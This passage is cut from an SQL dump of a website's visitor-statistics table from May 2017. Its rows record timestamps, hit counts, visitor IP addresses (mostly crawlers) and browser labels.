0,0,'217.182.132.27','other'),(110456,1494851209,1,1,0,0,'164.132.161.53','other'),(110457,1494852812,1,1,0,0,'164.132.161.66','other'),(110458,1494853808,2,2,0,0,'91.196.178.69','firefox'),(110459,1494854068,1,1,0,0,'51.255.65.14','other'),(110460,1494854260,1,1,0,0,'95.132.22.18','firefox'),(110461,1494854303,1,0,1,0,'66.249.76.27',''),(110462,1494854421,1,0,1,0,'66.249.76.107',''),(110463,1494854628,1,1,0,0,'217.182.132.86','other'),(110464,1494854654,1,1,0,0,'217.182.132.62','other'),(110465,1494854764,1,1,0,0,'37.54.40.223','chrome'),(110466,1494854846,1,1,0,0,'164.132.161.91','other'),(110467,1494854905,1,1,0,0,'178.255.215.94','other'),(110468,1494855038,1,0,1,0,'66.249.76.28',''),(110469,1494855174,1,1,0,0,'91.196.177.46','firefox'),(110470,1494855189,1,0,1,0,'66.249.66.87',''),(110471,1494855205,1,0,1,0,'66.249.76.46',''),(110472,1494855347,1,1,0,0,'51.255.65.54','other'),(110473,1494855377,1,1,0,0,'137.74.207.161','other'),(110474,1494855684,1,1,0,0,'164.132.161.21','other'),(110475,1494855703,1,1,0,0,'5.58.38.5','firefox'),(110476,1494855948,1,1,0,0,'51.255.65.96','other'),(110477,1494855954,2,2,0,0,'54.165.59.7','other'),(110478,1494856214,1,1,0,0,'217.182.132.187','other'),(110479,1494856225,1,0,1,0,'66.249.66.84',''),(110480,1494856251,1,0,1,0,'66.249.76.46',''),(110481,1494856528,2,2,0,0,'91.200.12.49','msie'),(110482,1494856732,1,1,0,0,'164.132.161.56','other'),(110483,1494857083,1,1,0,0,'54.165.59.7','other'),(110484,1494857243,1,1,0,0,'95.132.22.18','firefox'),(110485,1494857554,1,1,0,0,'217.182.132.240','other'),(110486,1494857945,1,1,0,0,'91.196.178.69','chrome'),(110487,1494858631,1,0,1,0,'68.180.228.186',''),(110488,1494858848,1,0,1,0,'66.249.66.183',''),(110489,1494859024,1,1,0,0,'91.196.178.69','chrome'),(110490,1494859100,1,1,0,0,'51.255.71.133','other'),(110491,1494859377,1,1,0,0,'164.132.161.60','other'),(110492,1494859482,1,1,0,0,'91.209.11.236','other'),(110493,1494859488,1,1,0,0,'217.182.132.60','other'),(110494,1494859533,1,1,0,0,'216.244.66.237','other'),(110495,1494859816,1,0,1,0,'66.249.76.107',''),(110496,1494859909,1,1,0,0,'217.182.132.64','other'),(110497,1494860336,1,1,0,0,'164.132.161.63','other'),(110498,1494860342,1,1,0,0,'8.29.198.25','other'),(110499,1494860465,1,1,0,0,'164.132.161.51','other'),(110500,1494860474,1,1,0,0,'91.196.178.164','chrome'),(110501,1494861788,1,1,0,0,'51.255.65.64','other'),(110502,1494861825,1,1,0,0,'151.80.27.116','other'),(110503,1494861990,1,0,1,0,'66.249.66.84',''),(110504,1494862126,1,1,0,0,'217.182.132.71','other'),(110505,1494862299,1,1,0,0,'164.132.162.160','other'),(110506,1494862729,2,2,0,0,'54.165.59.7','other'),(110507,1494862992,1,0,1,0,'207.46.13.39',''),(110508,1494863283,1,0,1,0,'68.180.231.24',''),(110509,1494863487,1,1,0,0,'164.132.161.47','other'),(110510,1494863556,1,1,0,0,'51.255.65.29','other'),(110511,1494863574,1,1,0,0,'217.182.132.175','other'),(110512,1494863731,1,0,1,0,'66.249.76.47',''),(110513,1494863803,1,0,1,0,'66.249.66.177',''),(110514,1494864541,1,1,0,0,'51.255.65.97','other'),(110515,1494864687,1,1,0,0,'137.74.207.170','other'),(110516,1494865059,1,1,0,0,'51.255.71.112','other'),(110517,1494865163,1,1,0,0,'217.182.132.15','other'),(110518,1494865379,1,0,1,0,'66.249.76.108',''),(110519,1494865964,1,1,0,0,'217.182.132.186','other'),(110520,1494866144,1,1,0,0,'194.183.171.92','chrome'),(110521,1494866842,1,1,0,0,'164.132.161.45','other'),(110522,1494866959,1,1,0,0,'217.182.132.188','other'),(110523,1494866980,1,0,1,0,'66.249.66.87',''),(110524,1494867536,1,1,0,0,'51.255.65.84','other'),(110525,1494867545,1,1,0,0,'51.255.65.41','other'),(110526,1494867828,1,1,0,0,'164.132.161.88','other'),(110527,1494867894,1,1,0,0,'164.132.161.77','other'),(110528,1494867983,1,1,0,0,'51.255.65.73','other'),(110529,1494868001,1,0,1,0,'66.249.66.87',''),(110530,1494868465,1,1,0,0,'164.132.161.53','other'),(110531,1494868555,1,1,0,0,'178.154.189.14','other'),(110532,1494868780,1,0,1,0,'66.249.76.46',''),(110533,1494868916,1,1,0,0,'51.255.65.34','other'),(110534,1494869011,1,1,0,0,'217.182.132.53','other'),(110535,1494869049,1,1,0,0,'51.255.71.130','other'),(110536,1494869434,1,1,0,0,'207.46.13.39','other'),(110537,1494869952,1,1,0,0,'164.132.161.49','other'),(110538,1494870008,1,1,0,0,'51.255.65.86','other'),(110539,1494870397,1,1,0,0,'217.182.132.153','other'),(110540,1494870412,1,1,0,0,'178.154.200.60','other'),(110541,1494870810,1,1,0,0,'51.255.65.23','other'),(110542,1494871014,1,1,0,0,'46.185.3.41','opera'),(110543,1494871168,1,1,0,0,'8.29.198.27','other'),(110544,1494871251,1,1,0,0,'217.182.132.182','other'),(110545,1494872374,1,1,0,0,'51.255.65.30','other'),(110546,1494873783,1,0,1,0,'66.249.76.108',''),(110547,1494873826,1,0,1,0,'66.249.76.107',''),(110548,1494873877,1,1,0,0,'164.132.161.83','other'),(110549,1494874574,1,1,0,0,'51.255.65.44','other'),(110550,1494874763,1,1,0,0,'66.249.76.109','chrome'),(110551,1494875025,1,0,1,0,'66.249.76.47',''),(110552,1494875561,1,1,0,0,'217.182.132.14','other'),(110553,1494876153,1,1,0,0,'217.23.11.70','chrome'),(110554,1494876924,1,1,0,0,'178.92.237.136','other'),(110555,1494876963,1,1,0,0,'164.132.161.11','other'),(110556,1494877847,1,0,1,0,'66.249.66.177',''),(110557,1494877868,1,0,1,0,'66.249.66.81',''),(110558,1494879758,1,0,1,0,'66.249.76.45',''),(110559,1494880336,1,1,0,0,'37.73.244.31','chrome'),(110560,1494881793,1,1,0,0,'180.76.15.24','other'),(110561,1494882000,1,1,0,0,'8.29.198.25','other'),(110562,1494882241,1,1,0,0,'51.255.65.81','other'),(110563,1494882720,1,1,0,0,'137.74.201.99','other'),(110564,1494882735,1,0,1,0,'66.249.76.46',''),(110565,1494882742,1,0,1,0,'66.249.76.45',''),(110566,1494882753,1,1,0,0,'137.74.203.194','other'),(110567,1494882955,1,1,0,0,'217.182.132.62','other'),(110568,1494883086,1,1,0,0,'217.182.132.52','other'),(110569,1494883285,1,0,1,0,'66.249.76.108',''),(110570,1494883440,1,1,0,0,'217.182.132.175','other'),(110571,1494884506,1,1,0,0,'164.132.161.48','other'),(110572,1494886019,1,1,0,0,'51.255.65.4','other'),(110573,1494886177,1,1,0,0,'217.182.132.20','other'),(110574,1494886323,1,1,0,0,'66.249.66.81','chrome'),(110575,1494886844,1,1,0,0,'164.132.161.79','other'),(110576,1494887062,1,0,1,0,'66.249.76.45',''),(110577,1494887176,1,0,1,0,'66.249.76.46',''),(110578,1494887199,1,1,0,0,'217.182.132.70','other'),(110579,1494887402,1,0,1,0,'66.249.66.87',''),(110580,1494887432,2,2,0,0,'164.132.161.87','other'),(110581,1494887810,1,1,0,0,'164.132.161.43','other'),(110582,1494888079,1,0,1,0,'66.249.76.46',''),(110583,1494888370,1,0,1,0,'66.249.66.180',''),(110584,1494888486,1,1,0,0,'137.74.207.120','other'),(110585,1494888487,1,1,0,0,'164.132.161.73','other'),(110586,1494888901,1,1,0,0,'217.182.132.156','other'),(110587,1494889099,1,1,0,0,'217.182.132.147','other'),(110588,1494889127,1,1,0,0,'141.8.142.15','other'),(110589,1494889840,1,1,0,0,'164.132.161.16','other'),(110590,1494890448,1,0,1,0,'68.180.228.186',''),(110591,1494890893,1,1,0,0,'164.132.161.10','other'),(110592,1494891186,1,0,1,0,'68.180.231.24',''),(110593,1494891495,1,1,0,0,'40.77.167.59','other'),(110594,1494891921,1,1,0,0,'217.182.132.146','other'),(110595,1494891955,1,1,0,0,'51.255.65.49','other'),(110596,1494892829,1,1,0,0,'8.29.198.27','other'),(110597,1494892887,1,0,1,0,'66.249.76.109',''),(110598,1494892905,1,1,0,0,'164.132.161.63','other'),(110599,1494892978,1,0,1,0,'66.249.76.108',''),(110600,1494892991,1,1,0,0,'217.182.132.4','other'),(110601,1494892993,1,0,1,0,'66.249.76.107',''),(110602,1494893699,1,1,0,0,'164.132.164.180','other'),(110603,1494893886,1,1,0,0,'51.255.71.110','other'),(110604,1494893936,1,1,0,0,'164.132.161.15','other'),(110605,1494894530,1,1,0,0,'164.132.161.81','other'),(110606,1494894563,1,1,0,0,'51.255.65.54','other'),(110607,1494894997,1,0,1,0,'66.249.76.46',''),(110608,1494896276,1,1,0,0,'51.255.71.118','other'),(110609,1494896751,1,1,0,0,'5.165.248.116','msie'),(110610,1494896828,1,1,0,0,'51.255.65.58','other'),(110611,1494896951,1,1,0,0,'217.182.132.60','other'),(110612,1494897485,1,1,0,0,'217.182.132.30','other'),(110613,1494898140,1,1,0,0,'66.249.76.46','chrome'),(110614,1494899286,1,0,1,0,'66.249.76.109',''),(110615,1494899324,1,0,1,0,'66.249.66.81',''),(110616,1494899452,1,1,0,0,'217.182.132.22','other'),(110617,1494899534,1,1,0,0,'51.255.65.50','other'),(110618,1494899756,1,1,0,0,'151.80.27.116','other'),(110619,1494899778,1,1,0,0,'164.132.161.59','other'),(110620,1494900518,1,0,1,0,'66.249.66.84',''),(110621,1494900682,1,1,0,0,'164.132.161.41','other'),(110622,1494901018,1,1,0,0,'51.255.65.59','other'),(110623,1494901244,1,0,1,0,'66.249.76.46',''),(110624,1494901408,1,1,0,0,'137.74.201.99','other'),(110625,1494901482,1,0,1,0,'66.249.76.45',''),(110626,1494902683,1,1,0,0,'51.255.65.65','other'),(110627,1494903230,1,1,0,0,'51.255.71.117','other'),(110628,1494903285,1,1,0,0,'180.76.15.149','other'),(110629,1494903289,1,1,0,0,'51.255.71.100','other'),(110630,1494903396,1,1,0,0,'51.255.65.56','other'),(110631,1494903656,1,1,0,0,'8.29.198.26','other'),(110632,1494904100,1,1,0,0,'164.132.161.44','other'),(110633,1494904203,1,1,0,0,'164.132.161.82','other'),(110634,1494904271,1,1,0,0,'217.182.132.91','other'),(110635,1494904422,1,1,0,0,'51.255.65.16','other'),(110636,1494904463,1,1,0,0,'217.182.132.79','other'),(110637,1494904773,1,1,0,0,'137.74.201.99','other'),(110638,1494904923,1,1,0,0,'164.132.161.21','other'),(110639,1494905800,1,1,0,0,'164.132.161.27','other'),(110640,1494906795,1,1,0,0,'137.74.207.159','other'),(110641,1494906845,1,0,1,0,'66.249.76.47',''),(110642,1494907720,1,1,0,0,'217.182.132.78','other'),(110643,1494907763,1,1,0,0,'164.132.161.38','other'),(110644,1494907782,1,1,0,0,'51.255.65.21','other'),(110645,1494908341,1,1,0,0,'51.255.65.69','other'),(110646,1494908712,1,0,1,0,'66.249.66.183',''),(110647,1494909068,1,1,0,0,'164.132.161.31','other'),(110648,1494909203,2,0,2,0,'66.249.66.84',''),(110649,1494909302,1,1,0,0,'217.182.132.60','other'),(110650,1494909457,1,1,0,0,'217.182.132.15','other'),(110651,1494909644,1,1,0,0,'164.132.161.12','other'),(110652,1494910029,1,1,0,0,'217.182.132.157','other'),(110653,1494910729,1,1,0,0,'51.255.65.6','other'),(110654,1494910839,1,1,0,0,'164.132.161.90','other'),(110655,1494910972,1,1,0,0,'217.182.132.155','other'),(110656,1494911045,1,1,0,0,'51.255.65.7','other'),(110657,1494911340,1,0,1,0,'66.249.66.180',''),(110658,1494911435,1,0,1,0,'66.249.76.45',''),(110659,1494911477,1,1,0,0,'157.55.39.152','other'),(110660,1494911816,1,1,0,0,'164.132.161.29','other'),(110661,1494911917,1,1,0,0,'217.182.132.60','other'),(110662,1494911997,1,0,1,0,'66.249.76.109',''),(110663,1494912047,1,0,1,0,'68.180.228.186',''),(110664,1494912333,1,1,0,0,'164.132.161.64','other'),(110665,1494912638,1,1,0,0,'91.196.178.71','chrome'),(110666,1494912708,1,1,0,0,'178.93.199.162','other'),(110667,1494913676,1,0,1,0,'66.249.76.109',''),(110668,1494913867,1,1,0,0,'207.46.13.149','other'),(110669,1494913927,1,1,0,0,'66.249.66.84','chrome'),(110670,1494914145,1,1,0,0,'217.182.132.170','other'),(110671,1494914266,1,1,0,0,'217.182.132.33','other'),(110672,1494914285,1,1,0,0,'51.255.65.49','other'),(110673,1494914483,1,1,0,0,'8.29.198.26','other'),(110674,1494914691,1,1,0,0,'176.96.197.7','chrome'),(110675,1494915636,1,0,1,0,'66.249.76.108',''),(110676,1494915834,1,1,0,0,'91.196.178.71','chrome'),(110677,1494916286,1,1,0,0,'91.196.177.46','firefox'),(110678,1494916355,1,1,0,0,'51.255.65.12','other'),(110679,1494917103,2,2,0,0,'91.196.178.162','chrome'),(110680,1494917157,1,1,0,0,'51.255.71.123','other'),(110681,1494917212,1,1,0,0,'91.196.178.71','chrome'),(110682,1494917266,1,1,0,0,'66.249.66.180','chrome'),(110683,1494917312,1,1,0,0,'91.196.178.68','chrome'),(110684,1494917357,1,0,1,0,'66.249.76.108',''),(110685,1494917369,1,1,0,0,'91.196.177.46','firefox'),(110686,1494917382,1,0,1,0,'66.249.76.45',''),(110687,1494917685,1,1,0,0,'164.132.161.7','other'),(110688,1494918223,1,0,1,0,'68.180.228.186',''),(110689,1494918594,1,1,0,0,'51.255.65.71','other'),(110690,1494918795,1,1,0,0,'164.132.161.68','other'),(110691,1494918952,1,1,0,0,'51.255.71.121','other'),(110692,1494919087,1,1,0,0,'91.196.178.68','chrome'),(110693,1494919110,1,1,0,0,'137.74.207.101','other'),(110694,1494919591,1,1,0,0,'66.249.66.81','chrome'),(110695,1494919632,1,1,0,0,'91.209.214.11','chrome'),(110696,1494920741,1,0,1,0,'66.249.76.107',''),(110697,1494920765,1,1,0,0,'92.113.56.251','chrome'),(110698,1494921126,1,0,1,0,'66.249.66.81',''),(110699,1494921450,2,2,0,0,'162.210.196.98','other'),(110700,1494921649,1,1,0,0,'51.255.65.24','other'),(110701,1494921782,1,1,0,0,'51.255.65.36','other'),(110702,1494921786,1,1,0,0,'164.132.161.75','other'),(110703,1494921811,1,1,0,0,'51.255.65.23','other'),(110704,1494922137,1,1,0,0,'66.102.9.29','chrome'),(110705,1494922331,1,1,0,0,'178.154.200.45','other'),(110706,1494922344,1,1,0,0,'5.255.253.43','other'),(110707,1494922389,1,1,0,0,'137.74.207.120','other'),(110708,1494922438,1,1,0,0,'51.255.65.6','other'),(110709,1494922507,1,1,0,0,'37.54.17.199','opera'),(110710,1494922781,1,1,0,0,'217.182.132.17','other'),(110711,1494922875,2,2,0,0,'164.132.161.71','other'),(110712,1494923774,1,1,0,0,'193.19.152.14','firefox'),(110713,1494923930,1,1,0,0,'91.196.178.71','firefox'),(110714,1494924040,1,1,0,0,'91.196.178.68','chrome'),(110715,1494924370,1,1,0,0,'207.46.13.39','other'),(110716,1494924488,1,1,0,0,'51.255.71.114','other'),(110717,1494924532,1,1,0,0,'217.182.132.148','other'),(110718,1494924813,1,1,0,0,'51.255.65.78','other'),(110719,1494924825,1,1,0,0,'51.255.65.91','other'),(110720,1494925317,1,1,0,0,'8.29.198.25','other'),(110721,1494925925,1,1,0,0,'66.249.76.45','chrome'),(110722,1494926053,1,0,1,0,'66.249.76.109',''),(110723,1494926441,1,1,0,0,'95.215.156.68','firefox'),(110724,1494926474,1,1,0,0,'37.52.19.101','chrome'),(110725,1494927127,1,0,1,0,'66.249.76.108',''),(110726,1494927203,1,1,0,0,'46.172.81.135','chrome'),(110727,1494927241,1,1,0,0,'95.108.179.15','other'),(110728,1494927449,1,1,0,0,'180.76.15.159','other'),(110729,1494927603,1,1,0,0,'51.255.65.32','other'),(110730,1494927901,1,0,1,0,'68.180.228.186',''),(110731,1494928318,1,0,1,0,'66.249.76.45',''),(110732,1494928403,1,0,1,0,'66.249.76.107',''),(110733,1494928443,1,1,0,0,'217.182.132.27','other'),(110734,1494928559,1,1,0,0,'51.255.65.69','other'),(110735,1494928830,1,1,0,0,'178.92.249.162','chrome'),(110736,1494928855,2,0,2,0,'66.249.76.108',''),(110737,1494929799,1,1,0,0,'51.255.71.116','other'),(110738,1494929894,1,1,0,0,'91.196.178.71','firefox'),(110739,1494930615,1,1,0,0,'51.255.65.10','other'),(110740,1494930717,1,1,0,0,'37.54.19.165','firefox'),(110741,1494930742,1,1,0,0,'176.31.231.10','other'),(110742,1494931507,1,1,0,0,'51.255.65.17','other'),(110743,1494931729,1,1,0,0,'91.196.178.161','chrome'),(110744,1494932012,1,1,0,0,'164.132.161.54','other'),(110745,1494932271,1,1,0,0,'66.249.76.46','chrome'),(110746,1494932313,1,0,1,0,'66.249.76.107',''),(110747,1494932332,1,0,1,0,'66.249.76.47',''),(110748,1494932384,1,1,0,0,'164.132.161.66','other'),(110749,1494932430,1,1,0,0,'217.182.132.176','other'),(110750,1494932694,1,0,1,0,'66.249.76.45',''),(110751,1494932783,1,1,0,0,'164.132.161.79','other'),(110752,1494932787,1,1,0,0,'91.196.178.131','firefox'),(110753,1494932930,1,1,0,0,'217.182.132.17','other'),(110754,1494933096,1,1,0,0,'66.249.76.107','chrome'),(110755,1494933572,1,1,0,0,'91.196.178.162','chrome'),(110756,1494933997,1,1,0,0,'51.255.71.118','other'),(110757,1494934208,1,1,0,0,'91.196.177.46','firefox'),(110758,1494934274,1,1,0,0,'164.132.161.15','other'),(110759,1494934348,1,1,0,0,'91.196.178.71','firefox'),(110760,1494934358,1,1,0,0,'217.182.132.33','other'),(110761,1494934568,1,1,0,0,'91.196.178.68','chrome'),(110762,1494934653,1,0,1,0,'66.249.76.109',''),(110763,1494934895,1,1,0,0,'37.73.242.29','chrome'),(110764,1494934964,1,1,0,0,'51.255.65.87','other'),(110765,1494935584,1,1,0,0,'213.108.45.138','firefox'),(110766,1494935679,1,0,1,0,'66.249.76.47',''),(110767,1494936143,1,1,0,0,'8.29.198.26','other'),(110768,1494936210,1,1,0,0,'164.132.161.38','other'),(110769,1494936336,2,2,0,0,'136.243.152.18','other'),(110770,1494936418,1,1,0,0,'51.255.65.24','other'),(110771,1494936730,1,1,0,0,'91.227.150.26','chrome'),(110772,1494936756,1,1,0,0,'91.196.177.46','firefox'),(110773,1494937105,1,1,0,0,'31.43.5.124','chrome'),(110774,1494937191,1,0,1,0,'66.249.76.108',''),(110775,1494937746,1,1,0,0,'66.249.76.46','chrome'),(110776,1494937827,1,1,0,0,'37.52.18.166','firefox'),(110777,4294967295,1,1,0,0,'37.52.18.166','firefox'),(110780,1494938246,1,1,0,0,'51.255.65.97','other'),(110781,1494938464,1,1,0,0,'178.251.108.133','chrome'),(110782,1494938678,1,1,0,0,'91.196.178.68','firefox'),(110783,1494938732,1,1,0,0,'91.196.178.68','chrome'),(110784,1494939497,1,1,0,0,'66.249.66.84','chrome'),(110785,1494939907,2,0,2,0,'66.249.76.108',''),(110786,1494940540,1,1,0,0,'91.196.178.162','chrome'),(110787,1494940965,1,1,0,0,'91.196.178.131','firefox'),(110788,1494941678,1,1,0,0,'213.160.133.82','chrome'),(110789,1494941964,1,0,1,0,'66.249.76.29',''),(110790,1494942596,1,1,0,0,'95.132.111.62','chrome'),(110791,1494942693,1,1,0,0,'66.249.66.87','chrome'),(110792,1494943080,1,1,0,0,'91.209.11.236','other'),(110793,1494943661,1,0,1,0,'66.249.66.87',''),(110794,1494943952,2,2,0,0,'91.196.177.46','firefox'),(110795,1494944199,93,2,91,0,'107.150.49.58',''),(110796,1494944994,1,1,0,0,'66.249.76.29','chrome'),(110797,1494945099,1,0,1,0,'66.249.76.107',''),(110798,1494945103,35,0,35,0,'107.150.49.58',''),(110799,1494945190,1,0,1,0,'66.249.66.177',''),(110800,1494945652,71,71,0,0,'107.150.49.58','msie'),(110801,1494945849,5,5,0,0,'107.150.49.58','firefox'),(110802,1494946173,1,0,1,0,'68.180.231.24',''),(110803,1494946582,1,1,0,0,'66.249.93.157','chrome'),(110804,1494946756,1,0,1,0,'66.249.76.108',''),(110805,1494946968,1,1,0,0,'8.29.198.25','other'),(110806,1494948669,1,0,1,0,'66.249.76.109',''),(110807,1494949652,1,0,1,0,'66.249.76.109',''),(110808,1494949701,1,0,1,0,'66.249.66.87',''),(110809,1494949708,1,0,1,0,'66.249.76.27',''),(110810,1494949923,1,1,0,0,'180.76.15.154','other'),(110811,1494950844,1,0,1,0,'66.249.76.27',''),(110812,1494951504,2,0,2,0,'66.249.76.107',''),(110813,1494951546,2,0,2,0,'66.249.66.180',''),(110814,1494951616,1,0,1,0,'66.249.76.108',''),(110815,1494952899,1,1,0,0,'66.249.76.109','chrome'),(110816,1494953683,1,1,0,0,'95.108.213.34','other'),(110817,1494954403,1,1,0,0,'51.255.65.79','other'),(110818,1494954497,1,1,0,0,'217.182.132.59','other'),(110819,1494954592,1,1,0,0,'51.255.65.18','other'),(110820,1494954865,1,1,0,0,'137.74.207.161','other'),(110821,1494954947,1,1,0,0,'164.132.161.39','other'),(110822,1494955229,1,0,1,0,'66.249.76.108',''),(110823,1494955505,1,1,0,0,'164.132.161.13','other'),(110824,1494955516,1,0,1,0,'66.249.76.107',''),(110825,1494955693,1,1,0,0,'66.249.93.205','chrome'),(110826,1494955710,1,1,0,0,'91.209.11.236','other'),(110827,1494956372,1,0,1,0,'66.249.66.81',''),(110828,1494956631,1,1,0,0,'217.182.132.55','other'),(110829,1494956632,1,1,0,0,'217.182.132.18','other'),(110830,1494957032,1,0,1,0,'66.249.76.27',''),(110831,1494957235,1,1,0,0,'164.132.161.55','other'),(110832,1494957242,1,0,1,0,'66.249.66.87',''),(110833,1494957351,1,1,0,0,'51.255.65.24','other'),(110834,1494957434,1,1,0,0,'51.255.65.19','other'),(110835,1494957480,1,0,1,0,'66.249.66.84',''),(110836,1494957618,1,0,1,0,'66.249.66.177',''),(110837,1494957659,1,1,0,0,'51.255.65.13','other'),(110838,1494957797,1,1,0,0,'8.29.198.27','other'),(110839,1494958025,1,1,0,0,'217.182.132.62','other'),(110840,1494958072,1,1,0,0,'66.102.9.40','chrome'),(110841,1494958750,1,0,1,0,'66.249.66.183',''),(110842,1494958762,1,1,0,0,'91.196.150.148','firefox'),(110843,1494958901,1,1,0,0,'141.8.142.164','other'),(110844,1494958979,2,2,0,0,'95.108.213.7','other'),(110845,1494958986,1,1,0,0,'5.255.253.63','other'),(110846,1494959396,1,0,1,0,'66.249.76.109',''),(110847,1494959423,1,1,0,0,'91.196.178.163','chrome'),(110848,1494959831,1,1,0,0,'164.132.161.10','other'),(110849,1494959994,1,1,0,0,'40.77.167.59','other'),(110850,1494960743,1,0,1,0,'66.249.66.183',''),(110851,1494960863,1,1,0,0,'164.132.161.51','other'),(110852,1494961142,1,0,1,0,'66.249.66.177',''),(110853,1494961551,1,1,0,0,'217.69.133.3','other'),(110854,1494961646,1,1,0,0,'37.46.228.194','firefox'),(110855,1494961835,1,1,0,0,'217.182.132.69','other'),(110856,1494961992,1,0,1,0,'66.249.66.81',''),(110857,1494962645,1,1,0,0,'217.182.132.63','other'),(110858,1494963471,1,1,0,0,'51.255.65.32','other'),(110859,1494964114,1,0,1,0,'66.249.66.177',''),(110860,1494964456,1,1,0,0,'217.182.132.93','other'),(110861,1494964526,1,1,0,0,'217.182.132.87','other'),(110862,1494965066,1,1,0,0,'180.76.15.147','other'),(110863,1494965138,4,0,4,0,'66.249.66.84',''),(110864,1494965188,1,0,1,0,'66.249.66.81',''),(110865,1494965250,1,0,1,0,'66.249.66.87',''),(110866,1494965395,1,1,0,0,'217.182.132.63','other'),(110867,1494965776,1,1,0,0,'51.255.71.121','other'),(110868,1494965884,1,1,0,0,'91.196.178.163','chrome'),(110869,1494966272,1,1,0,0,'164.132.162.187','other'),(110870,1494966500,1,1,0,0,'164.132.162.160','other'),(110871,1494966809,4,4,0,0,'91.209.11.236','other'),(110872,1494966871,1,1,0,0,'217.182.132.59','other'),(110873,1494967530,2,2,0,0,'144.76.12.99','other'),(110874,1494967674,1,1,0,0,'217.182.132.63','other'),(110875,1494967786,8,8,0,0,'91.209.11.236','other'),(110876,1494968361,1,1,0,0,'217.182.132.23','other'),(110877,1494968629,1,1,0,0,'8.29.198.25','other'),(110878,1494968789,4,4,0,0,'91.209.11.236','other'),(110879,1494969047,1,1,0,0,'217.182.132.75','other'),(110880,1494969276,1,1,0,0,'157.55.39.152','other'),(110881,1494970741,2,0,2,0,'66.249.66.177',''),(110882,1494970791,1,1,0,0,'217.69.136.204','other'),(110883,1494970833,1,0,1,0,'66.249.66.183',''),(110884,1494970905,1,1,0,0,'217.182.132.86','other'),(110885,1494970914,1,0,1,0,'66.249.66.87',''),(110886,1494971409,1,1,0,0,'217.182.132.70','other'),(110887,1494971761,12,12,0,0,'208.43.225.84','other'),(110888,1494971801,1,1,0,0,'164.132.161.42','other'),(110889,1494971811,9,9,0,0,'208.43.225.85','other'),(110890,1494971864,1,0,1,0,'66.249.66.87',''),(110891,1494972169,1,1,0,0,'180.76.15.143','other'),(110892,1494973121,1,1,0,0,'217.182.132.29','other'),(110893,1494973480,1,1,0,0,'164.132.161.6','other'),(110894,1494973648,1,1,0,0,'217.182.132.157','other'),(110895,1494973664,2,0,2,0,'66.249.66.87',''),(110896,1494973978,1,0,1,0,'66.249.66.81',''),(110897,1494974270,1,1,0,0,'217.182.132.155','other'),(110898,1494974292,1,1,0,0,'217.182.132.179','other'),(110899,1494974764,1,1,0,0,'51.255.71.119','other'),(110900,1494975788,1,1,0,0,'164.132.161.65','other'),(110901,1494976290,1,0,1,0,'66.249.66.183',''),(110902,1494976996,1,1,0,0,'217.182.132.56','other'),(110903,1494977184,1,1,0,0,'51.255.65.25','other'),(110904,1494977185,1,1,0,0,'217.182.132.68','other'),(110905,1494977239,1,0,1,0,'66.249.66.81',''),(110906,1494977550,1,0,1,0,'66.249.66.84',''),(110907,1494977740,1,1,0,0,'164.132.161.19','other'),(110908,1494979356,1,1,0,0,'157.55.39.152','other'),(110909,1494979456,1,1,0,0,'8.29.198.26','other'),(110910,1494979536,1,1,0,0,'164.132.161.68','other'),(110911,1494979539,1,1,0,0,'164.132.161.42','other'),(110912,1494979859,1,1,0,0,'217.182.132.80','other'),(110913,1494979860,1,1,0,0,'217.182.132.81','other'),(110914,1494979885,1,1,0,0,'51.255.65.93','other'),(110915,1494979962,1,1,0,0,'164.132.161.18','other'),(110916,1494980097,1,1,0,0,'66.102.9.29','chrome'),(110917,1494980251,1,1,0,0,'51.255.65.17','other'),(110918,1494980282,1,0,1,0,'66.249.66.81',''),(110919,1494980458,1,1,0,0,'164.132.161.58','other'),(110920,1494980470,1,1,0,0,'51.255.65.89','other'),(110921,1494980623,1,0,1,0,'66.249.66.183',''),(110922,1494980697,1,1,0,0,'40.77.167.59','other'),(110923,1494980807,1,1,0,0,'51.255.65.46','other'),(110924,1494981543,1,1,0,0,'51.255.65.14','other'),(110925,1494981884,1,0,1,0,'66.249.66.177',''),(110926,1494982156,1,1,0,0,'157.55.39.152','other'),(110927,1494982710,1,1,0,0,'51.255.65.73','other'),(110928,1494983175,1,1,0,0,'164.132.161.58','other'),(110929,1494983373,1,1,0,0,'141.8.142.164','other'),(110930,1494984037,1,1,0,0,'51.255.65.20','other'),(110931,1494984050,1,1,0,0,'51.255.65.22','other'),(110932,1494984110,1,0,1,0,'66.249.66.177',''),(110933,1494984322,1,0,1,0,'66.249.66.81',''),(110934,1494984637,1,1,0,0,'164.132.161.17','other'),(110935,1494984915,1,1,0,0,'51.255.65.61','other'),(110936,1494985063,1,1,0,0,'217.69.133.191','other'),(110937,1494985520,1,1,0,0,'164.132.161.79','other'),(110938,1494985683,1,1,0,0,'164.132.161.20','other'),(110939,1494985969,1,1,0,0,'217.182.132.155','other'),(110940,1494986241,1,1,0,0,'51.255.65.77','other'),(110941,1494986319,1,1,0,0,'164.132.161.45','other'),(110942,1494986756,1,1,0,0,'46.48.13.161','chrome'),(110943,1494986957,1,1,0,0,'51.255.65.92','other'),(110944,1494986996,1,0,1,0,'66.249.66.81',''),(110945,1494987687,1,1,0,0,'180.76.15.149','other'),(110946,1494988134,1,1,0,0,'207.46.13.149','other'),(110947,1494988244,1,1,0,0,'157.55.39.152','other'),(110948,1494989324,1,1,0,0,'217.182.132.64','other'),(110949,1494990178,1,1,0,0,'54.165.59.7','other'),(110950,1494990280,1,1,0,0,'8.29.198.26','other'),(110951,1494990383,5,0,5,0,'68.180.231.24',''),(110952,1494990492,1,1,0,0,'178.140.196.128','other'),(110953,1494990543,1,1,0,0,'217.182.132.184','other'),(110954,1494990649,1,1,0,0,'217.69.133.9','other'),(110955,1494991137,1,1,0,0,'217.182.132.32','other'),(110956,1494991259,1,1,0,0,'164.132.161.13','other'),(110957,1494991505,1,0,1,0,'66.249.66.81',''),(110958,1494991883,1,1,0,0,'51.255.65.40','other'),(110959,1494992198,1,0,1,0,'68.180.231.24',''),(110960,1494992912,1,1,0,0,'217.182.132.185','other'),(110961,1494993270,1,1,0,0,'217.182.132.22','other'),(110962,1494993362,1,0,1,0,'66.249.66.183',''),(110963,1494993730,1,1,0,0,'51.255.65.17','other'),(110964,1494993753,1,1,0,0,'91.209.11.236','other'),(110965,1494993798,1,1,0,0,'164.132.161.18','other'),(110966,1494993886,1,0,1,0,'66.249.66.180',''),(110967,1494994305,1,1,0,0,'164.132.161.11','other'),(110968,1494994484,1,0,1,0,'68.180.231.24',''),(110969,1494994497,2,0,2,0,'66.249.66.87',''),(110970,1494994810,1,1,0,0,'66.249.66.84','chrome'),(110971,1494994816,1,1,0,0,'66.249.66.81','chrome'),(110972,1494995251,1,1,0,0,'164.132.161.6','other'),(110973,1494995475,